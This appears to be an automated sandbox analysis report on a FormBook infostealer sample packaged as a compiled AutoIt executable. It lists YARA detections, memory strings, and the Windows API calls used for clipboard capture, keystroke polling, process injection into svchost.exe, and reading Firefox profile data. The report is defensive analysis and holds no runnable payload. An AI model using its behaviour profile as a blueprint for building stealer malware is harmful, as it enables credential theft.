Source: control.exe, 00000005.00000002.2620545178.0000000002C84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033V
Source: control.exe, 00000005.00000002.2620545178.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=http
Source: control.exe, 00000005.00000002.2620545178.0000000002C84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: control.exe, 00000005.00000002.2620545178.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: control.exe, 00000005.00000003.2026768122.0000000007CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_00404164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00404164

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_00404164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00404164

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_00403F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00403F66

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003F001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_003F001C

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_0041CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0041CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.26a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.26a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1841070035.0000000006FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2618010290.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2623602119.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2626863347.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2626768176.0000000004760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1838306488.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2626629633.00000000029E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1838875219.00000000034E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00393B3A
Source: 5by4QM3v89.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 5by4QM3v89.exe, 00000000.00000000.1352911591.0000000000444000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_100f332e-c
Source: 5by4QM3v89.exe, 00000000.00000000.1352911591.0000000000444000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_de006a3d-4
Source: 5by4QM3v89.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_61efd524-a
Source: 5by4QM3v89.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_f69e6e19-3

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026CC7F3 NtClose,	2_2_026CC7F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172B60 NtClose,LdrInitializeThunk,	2_2_03172B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03172DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031735C0 NtCreateMutant,LdrInitializeThunk,	2_2_031735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03174340 NtSetContextThread,	2_2_03174340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03174650 NtSuspendThread,	2_2_03174650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172B80 NtQueryInformationFile,	2_2_03172B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172BA0 NtEnumerateValueKey,	2_2_03172BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172BF0 NtAllocateVirtualMemory,	2_2_03172BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172BE0 NtQueryValueKey,	2_2_03172BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172AB0 NtWaitForSingleObject,	2_2_03172AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172AD0 NtReadFile,	2_2_03172AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172AF0 NtWriteFile,	2_2_03172AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172F30 NtCreateSection,	2_2_03172F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172F60 NtCreateProcessEx,	2_2_03172F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172F90 NtProtectVirtualMemory,	2_2_03172F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172FB0 NtResumeThread,	2_2_03172FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172FA0 NtQuerySection,	2_2_03172FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172FE0 NtCreateFile,	2_2_03172FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172E30 NtWriteVirtualMemory,	2_2_03172E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172E80 NtReadVirtualMemory,	2_2_03172E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172EA0 NtAdjustPrivilegesToken,	2_2_03172EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172EE0 NtQueueApcThread,	2_2_03172EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172D10 NtMapViewOfSection,	2_2_03172D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172D00 NtSetInformationFile,	2_2_03172D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172D30 NtUnmapViewOfSection,	2_2_03172D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172DB0 NtEnumerateKey,	2_2_03172DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172DD0 NtDelayExecution,	2_2_03172DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172C00 NtQueryInformationProcess,	2_2_03172C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172C70 NtFreeVirtualMemory,	2_2_03172C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172C60 NtCreateKey,	2_2_03172C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172CA0 NtQueryInformationToken,	2_2_03172CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172CC0 NtQueryVirtualMemory,	2_2_03172CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172CF0 NtOpenProcess,	2_2_03172CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03173010 NtOpenDirectoryObject,	2_2_03173010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03173090 NtSetValueKey,	2_2_03173090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031739B0 NtGetContextThread,	2_2_031739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03173D10 NtOpenProcessToken,	2_2_03173D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03173D70 NtOpenThread,	2_2_03173D70

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003FA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_003FA1EF

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003E85B0 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,

0_2_003E85B0

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003F51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_003F51BD

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_0039E6A0	0_2_0039E6A0
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003BD975	0_2_003BD975
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_0039FCE0	0_2_0039FCE0
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003B21C5	0_2_003B21C5
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003C62D2	0_2_003C62D2
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_004103DA	0_2_004103DA
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003C242E	0_2_003C242E
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003B25FA	0_2_003B25FA
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003EE616	0_2_003EE616
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003A66E1	0_2_003A66E1
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003C878F	0_2_003C878F
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_00410857	0_2_00410857
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003A8808	0_2_003A8808
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003C6844	0_2_003C6844
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003F8889	0_2_003F8889
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003BCB21	0_2_003BCB21
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003C6DB6	0_2_003C6DB6
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003A6F9E	0_2_003A6F9E
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003A3030	0_2_003A3030
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003B3187	0_2_003B3187
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003BF1D9	0_2_003BF1D9
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_00391287	0_2_00391287
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003B1484	0_2_003B1484
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003A5520	0_2_003A5520
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003B7696	0_2_003B7696
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003A5760	0_2_003A5760
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003B1978	0_2_003B1978
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003C9AB5	0_2_003C9AB5
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_00417DDB	0_2_00417DDB
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003BBDA6	0_2_003BBDA6
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003B1D90	0_2_003B1D90
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_0039DF00	0_2_0039DF00
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003A3FE0	0_2_003A3FE0
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_01319090	0_2_01319090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026B86F3	2_2_026B86F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026AE277	2_2_026AE277
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026A3200	2_2_026A3200
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026AE283	2_2_026AE283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026A23AC	2_2_026A23AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026A23B0	2_2_026A23B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026B68F3	2_2_026B68F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026B0143	2_2_026B0143
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026AE129	2_2_026AE129
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026AE133	2_2_026AE133
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026A1100	2_2_026A1100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026A2740	2_2_026A2740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026AFF23	2_2_026AFF23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026A2731	2_2_026A2731
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026A2CE0	2_2_026A2CE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026CEDF3	2_2_026CEDF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FA352	2_2_031FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032003E6	2_2_032003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314E3F0	2_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C02C0	2_2_031C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DA118	2_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03130100	2_2_03130100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C8158	2_2_031C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032001AA	2_2_032001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F41A2	2_2_031F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F81CC	2_2_031F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D2000	2_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03164750	2_2_03164750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313C7C0	2_2_0313C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315C6E0	2_2_0315C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140535	2_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03200591	2_2_03200591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E4420	2_2_031E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F2446	2_2_031F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031EE4F6	2_2_031EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FAB40	2_2_031FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F6BD7	2_2_031F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313EA80	2_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03156962	2_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320A9A6	2_2_0320A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314A840	2_2_0314A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03142840	2_2_03142840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031268B8	2_2_031268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E8F0	2_2_0316E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03160F30	2_2_03160F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E2F30	2_2_031E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03182F28	2_2_03182F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B4F40	2_2_031B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031BEFA0	2_2_031BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03132FC8	2_2_03132FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314CFE0	2_2_0314CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FEE26	2_2_031FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140E59	2_2_03140E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03152E90	2_2_03152E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FCE93	2_2_031FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FEEDB	2_2_031FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DCD1F	2_2_031DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314AD00	2_2_0314AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03158DBF	2_2_03158DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313ADE0	2_2_0313ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140C00	2_2_03140C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0CB5	2_2_031E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03130CF2	2_2_03130CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F132D	2_2_031F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312D34C	2_2_0312D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0318739A	2_2_0318739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031452A0	2_2_031452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315B2C0	2_2_0315B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E12ED	2_2_031E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320B16B	2_2_0320B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312F172	2_2_0312F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0317516C	2_2_0317516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314B1B0	2_2_0314B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031EF0CC	2_2_031EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031470C0	2_2_031470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F70E9	2_2_031F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FF0E0	2_2_031FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FF7B0	2_2_031FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031317EC	2_2_031317EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03185630	2_2_03185630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F16CC	2_2_031F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F7571	2_2_031F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DD5B0	2_2_031DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032095C3	2_2_032095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FF43F	2_2_031FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03131460	2_2_03131460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FFB76	2_2_031FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315FB80	2_2_0315FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B5BF0	2_2_031B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0317DBF9	2_2_0317DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FFA49	2_2_031FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F7A46	2_2_031F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B3A6C	2_2_031B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DDAAC	2_2_031DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03185AA0	2_2_03185AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E1AA3	2_2_031E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031EDAC6	2_2_031EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D5910	2_2_031D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03149950	2_2_03149950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315B950	2_2_0315B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AD800	2_2_031AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031438E0	2_2_031438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FFF09	2_2_031FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03141F92	2_2_03141F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FFFB1	2_2_031FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03103FD2	2_2_03103FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03103FD5	2_2_03103FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03149EB0	2_2_03149EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F1D5A	2_2_031F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03143D40	2_2_03143D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F7D73	2_2_031F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315FDC0	2_2_0315FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B9C32	2_2_031B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FFCF2	2_2_031FFCF2

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: String function: 00397DE1 appears 35 times
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: String function: 003B0AE3 appears 70 times
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: String function: 003B8900 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0312B970 appears 283 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03175130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 031BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03187E54 appears 109 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 031AEA12 appears 86 times

Source: 5by4QM3v89.exe, 00000000.00000003.1391586928.0000000003CE3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 5by4QM3v89.exe
Source: 5by4QM3v89.exe, 00000000.00000003.1391322495.0000000003E8D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 5by4QM3v89.exe

Source: 5by4QM3v89.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@5/5

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003FA06A GetLastError,FormatMessageW,

0_2_003FA06A

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003E81CB AdjustTokenPrivileges,CloseHandle,		0_2_003E81CB
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003E87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_003E87E1

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003FB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_003FB333

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_0040EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0040EE0D

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003FC397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_003FC397

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_00394E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00394E89

Source: C:\Users\user\Desktop\5by4QM3v89.exe

File created: C:\Users\user\AppData\Local\Temp\autB5BA.tmp

Jump to behavior

Source: 5by4QM3v89.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

